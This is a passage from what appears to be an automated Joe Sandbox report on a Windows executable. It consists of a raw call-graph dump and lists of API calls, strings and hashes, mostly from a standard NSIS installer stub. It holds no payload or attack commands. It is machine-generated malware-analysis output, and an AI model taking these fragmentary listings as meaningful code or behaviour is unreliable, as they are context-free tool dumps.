3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 
4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 
40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 
SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API 
calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 
3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 
405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 

Control-flow Graph

[Control-flow graph starting at 004050F9; legend: Executed / Not Executed]
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
• CloseClipboard.USER32 ref: 0040549A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
• String ID: New install of "%s" to "%s"${
• API String ID: 2110491804-1641061399
• Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
• Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
• Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                          • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                          • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                          • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                          • String ID: jF
                                                                                                                                                                                                                                                                                                          • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                          • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                          • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 310444273-0

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 004016CB
